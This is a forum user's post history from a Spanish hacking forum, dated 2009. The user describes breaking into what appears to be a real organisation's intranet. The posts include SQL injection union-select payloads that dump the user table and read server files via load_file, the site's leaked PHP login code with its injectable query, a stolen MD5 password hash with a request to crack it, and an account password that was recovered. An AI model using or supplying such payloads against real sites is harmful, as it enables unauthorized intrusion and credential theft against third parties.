vengo denuevo xd
la password era "holitas" pero cunado la probe me decia usuario desactivado
entonces no se puede?
la password era "holitas" pero cunado la probe me decia usuario desactivado
entonces no se puede?
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Páginas1
#2
Nivel Web / Re: Ayuda Mmm...
9 Julio 2009, 02:49 AMCita de: WHK en 7 Julio 2009, 19:42 PM
union select 1,2,3,4,usuario,clave,7,8,9,0 from basededatos.usuarios /*
donde basededatos es el nombre de la base de datos que sacas con
union select 1,2,3,4,database(),6,7,8,9,0 /*
Si te limita a una sola columna le vas dando limit 1 y vas seleccionando user por user
see me resulto pero hay un problema, creo que me manda la clave md5 ![:-\](https://forum.elhacker.net/Smileys/navidad/undecided.gif ":-\")
a95238df9190e26ce56f7f95bc51d229
el usuario no tiene problemas, no saben de un crack de md5?
#3
Nivel Web / Ayuda Mmm...
7 Julio 2009, 01:11 AM
Estaba intenta ingresar una web solo por el afan de aprender xD
Me ayude con un video de youtube...
Pero al cargar el archivo intranetapp/admin/index.php por medio de load_file(...
me manda lo siguiente
se que la tabla de usuario es usuario xd pero la password nose
entonces si me pudieran ayudar xd
Pd: union select 1,2,3,4,load_file(0x433a2f77616d702f7777772f68746d6c312f6172636869766f732f696e7472616e65746170702f61646d696e2f696e6465782e706870),6,7,8,9,0/*
Me ayude con un video de youtube...
Pero al cargar el archivo intranetapp/admin/index.php por medio de load_file(...
me manda lo siguiente
Código [Seleccionar]
// Carga el archivo de definiciones
include_once ('_conexion.php');
$error = "";
setcookie("s_usuarioyo[un]");
if (isset($_POST["user"])){
$query = "select * from usuarios where usuario = '$_POST[user]'";
$result = mysql_query($query, $link);
if (mysql_num_rows($result) == 0) {
$error = "El Usuario No Existe"; }
else {
$rs = mysql_fetch_array($result);
if ($rs["clave"] != md5($HTTP_POST_VARS["pass"])) {
$error = "Password Incorrecto"; }
else {
if ($rs[estado] == '0') {
$error = "Usuario Desactivado"; }
else {
$sql2 = "SELECT max(codigo) as maximo from auditoria";
$results = mysql_query($sql2,$link);
$rs2 = mysql_fetch_array($results);
$nucod=$rs2[maximo]+1;
$nucod=str_pad($nucod,4,"0",STR_PAD_LEFT);
$fechasesion=date("Y/m/d");
$horainicio=date("h:i:s");
$sql2 = "insert into auditoria (codigo,usuario,fecha_sesion,hora_inicio) values ('$nucod','$HTTP_POST_VARS[user]','$fechasesion','$horainicio')";
mysql_query($sql2,$link);
session_start();
setcookie('s_usuarioyo[un]', $HTTP_POST_VARS["user"]);
setcookie('s_usuarioyo[ut]', $rs[tipousuario]);
setcookie('s_usuarioyo[nc]', $nucod);
if ($rs[tipousuario] == 'o') {
header("Location:padron.php");}
else {
header("Location:padron.php");}
}
}
}
}
if ($_GET[salir]!=""){
$horafin=date("h:i:s");
$sql2 = "update auditoria set hora_fin='$horafin' where codigo='$_GET[salir]'";
mysql_query($sql2,$link);
}
?>se que la tabla de usuario es usuario xd pero la password nose
entonces si me pudieran ayudar xd
Pd: union select 1,2,3,4,load_file(0x433a2f77616d702f7777772f68746d6c312f6172636869766f732f696e7472616e65746170702f61646d696e2f696e6465782e706870),6,7,8,9,0/*
Páginas1